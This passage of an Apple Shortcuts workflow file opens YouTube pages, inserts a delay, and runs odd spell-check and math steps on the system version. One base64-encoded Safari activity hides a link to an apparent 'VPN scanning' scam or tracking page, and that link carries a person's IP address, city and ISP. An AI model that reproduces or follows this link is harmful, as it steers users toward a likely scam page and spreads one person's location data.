				Z0TSQEFqa18QElVBVXNlckFjdGl2aXR5SW5mb6JsRF8Q
				ElVBVXNlckFjdGl2aXR5SW5mb18QD05TS2V5ZWRBcmNo
				aXZlctFvcFRyb290gAEACAARABoAIwAtADIANwBLAFEA
				hACRAJcAogC4AM8A1wDzAQsBGgEhAS4BMwE8AUkBXgFm
				AYABjwGUAasBtwHFAc4B4gHkAeYB6AHqAewB7gHvAfAB
				8gH0AfYB+AH6AfwB/QH/AgECAwIFAgYCCAIKAgwCDQIU
				AhwCJwIoAikCKwIwAjsCRAJRAlQCXQJ3Ap4CowKrBNsE
				3QTiBPAE9AUCBQkFEAUTBRUFFwUaBRwFHgUgBUcFZAVp
				BYMFhQWKBj0GPwZEBloGXgZjBmQGZgZrBnEGdAZ5Bo4G
				kQamBrgGuwbAAAAAAAAAAgEAAAAAAAAAcQAAAAAAAAAA
				AAAAAAAABsI=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.correctspelling</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>239B3EE7-918C-4119-825E-A33995DE1BCA</string>
				<key>text</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>System Version</string>
						<key>OutputUUID</key>
						<string>8366B249-6AF4-491F-B714-8D41ADF6B8B8</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.handoff</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.google.ios.youtube</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGbW5YJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK8QEQcIOT9FRkdL
				UFhZWl1gY2ZpVSRudWxs3xAYCQoLDA0ODxAREhMUFRYX
				GBkaGxwdHh8gISIjIyMmJygjKiMjIy4oMDEjMygjIzco
				XHJlcXVpcmVkS2V5c1V0aXRsZVp3ZWJwYWdlVVJMXxAT
				ZHluYW1pY0FjdGl2aXR5VHlwZV8QFHBlcnNpc3RlbnRJ
				ZGVudGlmaWVyV29wdGlvbnNfEBllbGlnaWJsZUZvclB1
				YmxpY0luZGV4aW5nXxAVZWxpZ2libGVGb3JQcmVkaWN0
				aW9uXmV4cGlyYXRpb25EYXRlViRjbGFzc1xwYXlsb2Fk
				RXJyb3JUdXVpZFhrZXl3b3Jkc1xhY3Rpdml0eVR5cGVf
				EBJlbGlnaWJsZUZvckhhbmRvZmZXdmVyc2lvbl8QF2Nv
				bnRlbnRBdHRyaWJ1dGVTZXREYXRhXnRlYW1JZGVudGlm
				aWVyVHR5cGVfEBRlbGlnaWJsZUZvclJlbWluZGVyc1ty
				ZWZlcnJlclVSTF1jb250ZW50QWN0aW9uWHBheWxvYWRz
				XxARZWxpZ2libGVGb3JTZWFyY2iADoAEgACAAIAAgAII
				CYAAgBCAAIAAgACABQkQAYAGgAAQAQmAAIAAgAgJ0zo7
				Ejw9PldOUy5rZXlzWk5TLm9iamVjdHOgoIAD0kBBQkNa
				JGNsYXNzbmFtZVgkY2xhc3Nlc1xOU0RpY3Rpb25hcnmi
				QkRYTlNPYmplY3RfEBdPcGVuIFN1YnNjcmlwdGlvbnMg
				cGFnZV8QJGNvbS5nb29nbGUuaW9zLnlvdXR1YmUuc2ly
				aS5zdWJzLXRhYtJIEklKV05TLmRhdGFPEQIsYnBsaXN0
				MDDUAQIDBAUGFRZYJHZlcnNpb25YJG9iamVjdHNZJGFy
				Y2hpdmVyVCR0b3ASAAGGoKQHCA0OVSRudWxs0gkKCwxZ
				Y29udGFpbmVyViRjbGFzc4ACgANPEPzeugABAAD8AAAA
				0gAAAB0AAADw0gAAAAAA0gAAALEAAAAEAKEAAAAlAAAA
				X19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRl
				U2V0AFoAAAACAEgAAAABACgAAABPcGVuIFlvdVR1YmUg
				dG8geW91ciBTdWJzY3JpcHRpb25zIHBhZ2UADAAAAHB1
				YmxpYy5pdGVtAAAAAgAVAAAAiAAAAPQAAAAAXAAAAPQM
				AAAAAAAMAAAAAQAAAAAAJwAAAPQAAAAA4lAAAADxrgAA
				APESAGtNREl0ZW1EZXNjcmlwdGlvbgASAGtNREl0ZW1D
				b250ZW50VHlwZQDSDxARElokY2xhc3NuYW1lWCRjbGFz
				c2VzXxAcQ1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNl
				dKITFF8QHENTU2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVT
				ZXRYTlNPYmplY3RfEA9OU0tleWVkQXJjaGl2ZXLRFxhU
				cm9vdIABAAgAEQAaACMALQAyADcAPABCAEcAUQBYAFoA
				XAFbAWABawF0AZMBlgG1Ab4B0AHTAdgAAAAAAAACAQAA
				AAAAAAAZAAAAAAAAAAAAAAAAAAAB2oAH0kBBTE1dTlNN
				dXRhYmxlRGF0YaNOT0RdTlNNdXRhYmxlRGF0YVZOU0Rh
				dGHTOjsSUVRXolJTgAmACqJVVoALgAyADV8QJFVBSU5T
				dWdnZXN0ZWRJbnZvY2F0aW9uUGhyYXNlUGF5bG9hZF8Q
				GlVBSW50ZW50c0lkZW50aWZpZXJQYXlsb2Fk0kgSW0pP
				EBdPcGVuIFN1YnNjcmlwdGlvbnMgcGFnZYAH0kgSXkpP
				ELBicGxpc3QwMNQBAgMEBQYJClgkdmVyc2lvblgkb2Jq
				ZWN0c1kkYXJjaGl2ZXJUJHRvcBIAAYagogcIVSRudWxs
				XxAkODFFODAwODUtODJCQS00M0FDLTkxNUQtQkI3MDBF
				OUEzQzU2XxAPTlNLZXllZEFyY2hpdmVy0QsMVHJvb3SA
				AQgRGiMtMjc6QGd5fIEAAAAAAAABAQAAAAAAAAANAAAA
				AAAAAAAAAAAAAAAAg4AH0kBBYWJfEBNOU011dGFibGVE
				aWN0aW9uYXJ5o2FCRNI7EmRloIAP0kBBZ2hVTlNTZXSi
				Z0TSQEFqa18QElVBVXNlckFjdGl2aXR5SW5mb6JsRF8Q
				ElVBVXNlckFjdGl2aXR5SW5mb18QD05TS2V5ZWRBcmNo
				aXZlctFvcFRyb290gAEACAARABoAIwAtADIANwBLAFEA
				hACRAJcAogC4AM8A1wDzAQsBGgEhAS4BMwE8AUkBXgFm
				AYABjwGUAasBtwHFAc4B4gHkAeYB6AHqAewB7gHvAfAB
				8gH0AfYB+AH6AfwB/QH/AgECAwIFAgYCCAIKAgwCDQIU
				AhwCJwIoAikCKwIwAjsCRAJRAlQCXQJ3Ap4CowKrBNsE
				3QTiBPAE9AUCBQkFEAUTBRUFFwUaBRwFHgUgBUcFZAVp
				BYMFhQWKBj0GPwZEBloGXgZjBmQGZgZrBnEGdAZ5Bo4G
				kQamBrgGuwbAAAAAAAAAAgEAAAAAAAAAcQAAAAAAAAAA
				AAAAAAAABsI=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.delay</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFDelayTime</key>
				<real>13</real>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJicjKSMjIy0nLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggJgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3RXTG9hZGlu
				Z9NFEkYjSElXTlMuYmFzZVtOUy5yZWxhdGl2ZYAAgAeA
				Bl8Qs2h0dHA6Ly92cG4tc2Nhbm5pbmcyLnNpdGUvdnBu
				ZW5nZW4yL2luZGV4dnAucGhwPyZtb2RlbD1pUGhvbmUm
				YnJvd3Nlcj1Nb2JpbGUlMjBTYWZhcmkmY2l0eT1XZXN0
				ZXJ2aWxsZSZicmFuZD1BcHBsZSZpc3A9U3BlY3RydW0m
				aXA9NjUuMjQuMzIuOTMmdGQ9eGVudHJhY2tpbmcuY29t
				JnVjbGljaz1jaWo2Zm4xNndq0j4/TE1VTlNVUkyiTEJf
				EB1OU1VzZXJBY3Rpdml0eVR5cGVCcm93c2luZ1dlYtJQ
				ElFSV05TLmRhdGFPEQPWYnBsaXN0MDDUAQIDBAUGFRZY
				JHZlcnNpb25YJG9iamVjdHNZJGFyY2hpdmVyVCR0b3AS
				AAGGoKQHCA0OVSRudWxs0gkKCwxZY29udGFpbmVyViRj
				bGFzc4ACgANPEQKl3roAAQAApQIAADACAAAdAAAA8DAC
				AAAAADACAAAPAgAABAD/AQAAJQAAAF9fY2xhc3M6Q1NT
				ZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNldAC4AQAABQB/
				AQAABwAPAAAAcHVibGljLmNvbnRlbnQAXAEAAP/+DiB2
				AHAAbgAtAHMAYwBhAG4AbgBpAG4AZwAyAC4AcwBpAHQA
				ZQAvAHYAcABuAGUAbgBnAGUAbgAyAC8AaQBuAGQAZQB4
				AHYAcAAuAHAAaABwAD8AJgBtAG8AZABlAGwAPQBpAFAA
				aABvAG4AZQAmAGIAcgBvAHcAcwBlAHIAPQBNAG8AYgBp
				AGwAZQAlADIAMABTAGEAZgBhAHIAaQAmAGMAaQB0AHkA
				PQBXAGUAcwB0AGUAcgB2AGkAbABsAGUAJgBiAHIAYQBu
				AGQAPQBBAHAAcABsAGUAJgBpAHMAcAA9AFMAcABlAGMA
				dAByAHUAbQAmAGkAcAA9ADYANQAuADIANAAuADMAMgAu
				ADkAMwAmAHQAZAA9AHgAZQBuAHQAcgBhAGMAawBpAG4A
				ZwAuAGMAbwBtACYAdQBjAGwAaQBjAGsAPQBjAGkAagA2
				AGYAbgAxADYAdwBqAAAAAAABAAMAAwADAAMABQAWAAAA
				XAAAAPRUAAAAAAAAAOA/AAAAbwAAAPUrAAAAAAAAAOAA
				AAAAAAAAAOAMAAAAAAAMAAAAAQAAAAAAJwAAAPQAAAAA
				4lAAAADxDAIAAPETAGtNREl0ZW1UaHVtYm5haWxVUkwA
				EgBrTURJdGVtQ29udGVudFR5cGUAEQBrTURJdGVtQ29u
				dGVudFVSTAASAGtNREl0ZW1EZXNjcmlwdGlvbgAeAGtN
				REl0ZW1SZWxhdGVkVW5pcXVlSWRlbnRpZmllcgDSDxAR
				ElokY2xhc3NuYW1lWCRjbGFzc2VzXxAcQ1NTZWFyY2hh
				YmxlSXRlbUF0dHJpYnV0ZVNldKITFF8QHENTU2VhcmNo
				YWJsZUl0ZW1BdHRyaWJ1dGVTZXRYTlNPYmplY3RfEA9O
				U0tleWVkQXJjaGl2ZXLRFxhUcm9vdIABAAgAEQAaACMA
				LQAyADcAPABCAEcAUQBYAFoAXAMFAwoDFQMeAz0DQANf
				A2gDegN9A4IAAAAAAAACAQAAAAAAAAAZAAAAAAAAAAAA
				AAAAAAADhIAK0j4/VFVdTlNNdXRhYmxlRGF0YaNWV0Jd
				TlNNdXRhYmxlRGF0YVZOU0RhdGHSORJZWqCADNI+P1xd
				VU5TU2V0olxC0j4/X2BfEBJVQVVzZXJBY3Rpdml0eUlu
				Zm+iYUJfEBJVQVVzZXJBY3Rpdml0eUluZm9fEA9OU0tl
				eWVkQXJjaGl2ZXLRZGVUcm9vdIABAAgAEQAaACMALQAy
				ADcARgBMAH0AigCQAJsAsQDIANAA7AEEARMBGgEnASwB
				NQFCAVcBXwF5AYgBjQGkAbABvgHSAdQB1gHYAdoB3AHe
				Ad8B4AHiAeQB5gHoAeoB7AHtAe8B8QHzAfUB9gH4AfoB
				+wICAgoCFQIWAhcCGQIeAikCMgI/AkICSwJTAloCYgJu
				AnACcgJ0AyoDLwM1AzgDWANdA2UHPwdBB0YHVAdYB2YH
				bQdyB3MHdQd6B4AHgweIB50HoAe1B8cHygfPAAAAAAAA
				AgEAAAAAAAAAZgAAAAAAAAAAAAAAAAAAB9E=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJicjKSMjIy0nLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggJgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3ReWW91VHVi
				ZSBTdHVkaW/TRRJGI0hJV05TLmJhc2VbTlMucmVsYXRp
				dmWAAIAHgAZfEDFodHRwczovL3N0dWRpby55b3V0dWJl
				LmNvbS92aWRlby81NjFiVHRZRHFHQS9lZGl00j4/TE1V
				TlNVUkyiTEJfEB1OU1VzZXJBY3Rpdml0eVR5cGVCcm93
				c2luZ1dlYtJQElFSV05TLmRhdGFPEQLQYnBsaXN0MDDU
				AQIDBAUGFRZYJHZlcnNpb25YJG9iamVjdHNZJGFyY2hp
				dmVyVCR0b3ASAAGGoKQHCA0OVSRudWxs0gkKCwxZY29u
				dGFpbmVyViRjbGFzc4ACgANPEQGf3roAAQAAnwEAACoB
				AAAdAAAA8CoBAAAAACoBAAAJAQAABAD5AAAAJQAAAF9f
				Y2xhc3M6Q1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNl
				dACyAAAABQB5AAAABwAPAAAAcHVibGljLmNvbnRlbnQA
				VgAAAP/+DiBzAHQAdQBkAGkAbwAuAHkAbwB1AHQAdQBi
				AGUALgBjAG8AbQAvAHYAaQBkAGUAbwAvADUANgAxAGIA
				VAB0AFkARABxAEcAQQAvAGUAZABpAHQAAAAAAAEAAwAD
				AAMAAwAFABYAAABcAAAA9FQAAAAAAAAA4D8AAABvAAAA
				9SsAAAAAAAAA4AAAAAAAAAAA4AwAAAAAAAwAAAABAAAA
				AAAnAAAA9AAAAADiUAAAAPEGAQAA8RMAa01ESXRlbVRo
				dW1ibmFpbFVSTAASAGtNREl0ZW1Db250ZW50VHlwZQAR
				AGtNREl0ZW1Db250ZW50VVJMABIAa01ESXRlbURlc2Ny
				aXB0aW9uAB4Aa01ESXRlbVJlbGF0ZWRVbmlxdWVJZGVu
				dGlmaWVyANIPEBESWiRjbGFzc25hbWVYJGNsYXNzZXNf
				EBxDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRlU2V0ohMU
				XxAcQ1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNldFhO
				U09iamVjdF8QD05TS2V5ZWRBcmNoaXZlctEXGFRyb290
				gAEACAARABoAIwAtADIANwA8AEIARwBRAFgAWgBcAf8C
				BAIPAhgCNwI6AlkCYgJ0AncCfAAAAAAAAAIBAAAAAAAA
				ABkAAAAAAAAAAAAAAAAAAAJ+gArSPj9UVV1OU011dGFi
				bGVEYXRho1ZXQl1OU011dGFibGVEYXRhVk5TRGF0YdI5
				EllaoIAM0j4/XF1VTlNTZXSiXELSPj9fYF8QElVBVXNl
				ckFjdGl2aXR5SW5mb6JhQl8QElVBVXNlckFjdGl2aXR5
				SW5mb18QD05TS2V5ZWRBcmNoaXZlctFkZVRyb290gAEA
				CAARABoAIwAtADIANwBGAEwAfQCKAJAAmwCxAMgA0ADs
				AQQBEwEaAScBLAE1AUIBVwFfAXkBiAGNAaQBsAG+AdIB
				1AHWAdgB2gHcAd4B3wHgAeIB5AHmAegB6gHsAe0B7wHx
				AfMB9QH2AfgB+gH7AgICCgIVAhYCFwIZAh4CKQIyAj8C
				QgJLAloCYQJpAnUCdwJ5AnsCrwK0AroCvQLdAuIC6gW+
				BcAFxQXTBdcF5QXsBfEF8gX0BfkF/wYCBgcGHAYfBjQG
				RgZJBk4AAAAAAAACAQAAAAAAAABmAAAAAAAAAAAAAAAA
				AAAGUA==
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.math</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>4FFCB10E-80C9-4850-924E-25777EE84283</string>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>System Version</string>
						<key>OutputUUID</key>
						<string>8366B249-6AF4-491F-B714-8D41ADF6B8B8</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.addmusictoupnext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFMusic</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>Text</string>
						<key>OutputUUID</key>
						<string>239B3EE7-918C-4119-825E-A33995DE1BCA</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.number.random</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>8CE4AC42-5013-43B5-9571-8EA638F2D5F6</string>
			</dict>
		</dict>
	</array>
	<key>WFWorkflowClientVersion</key>
	<string>1050.22</string>
	<key>WFWorkflowIcon</key>
	<dict>
		<key>WFWorkflowIconGlyphNumber</key>
		<integer>59714</integer>
		<key>WFWorkflowIconStartColor</key>
		<integer>4251333119</integer>
	</dict>
	<key>WFWorkflowImportQuestions</key>
	<array/>
	<key>WFWorkflowInputContentItemClasses</key>
	<array/>
	<key>WFWorkflowMinimumClientVersion</key>
	<integer>900</integer>
	<key>WFWorkflowMinimumClientVersionString</key>
	<string>900</string>
	<key>WFWorkflowTypes</key>
	<array>
		<string>Watch</string>
		<string>ActionExtension</string>
		<string>NCWidget</string>
	</array>
</dict>
</plist>
